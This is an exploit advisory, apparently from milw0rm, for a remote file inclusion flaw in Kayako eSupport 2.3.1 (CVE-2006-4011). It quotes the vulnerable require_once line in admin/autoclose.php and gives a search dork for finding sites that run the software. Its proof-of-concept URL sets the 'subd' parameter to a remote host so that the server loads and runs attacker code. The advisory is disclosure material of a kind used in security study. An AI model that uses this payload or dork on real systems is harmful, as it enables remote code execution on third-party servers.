Kayako eSupport 2.3.1 - 'subd' Remote File Inclusion

Related Vulnerabilities: CVE-2006-4011  
Publish Date: 02 Aug 2006
Author: beford
                Script: Kayako eSupport <= 2.3.1
Vendor: Kayako (www.kayako.com)
Discovered: beford <xbefordx gmail com>
Comments: It seems like the vendor silently fixed the issue in the
current version (more like since v2.3.5) withouth warning users of
previous versions, noobs. Requires that "register_globals" is enabled.
Vulnerable File: esupport/admin/autoclose.php

require_once $subd . "functions.php";

Not-leet-enough: "Powered By Kayako eSupport"

POC: http://omghax.com/esupport/admin/autoclose.php?subd=http://remotefile/?

# milw0rm.com [2006-08-02]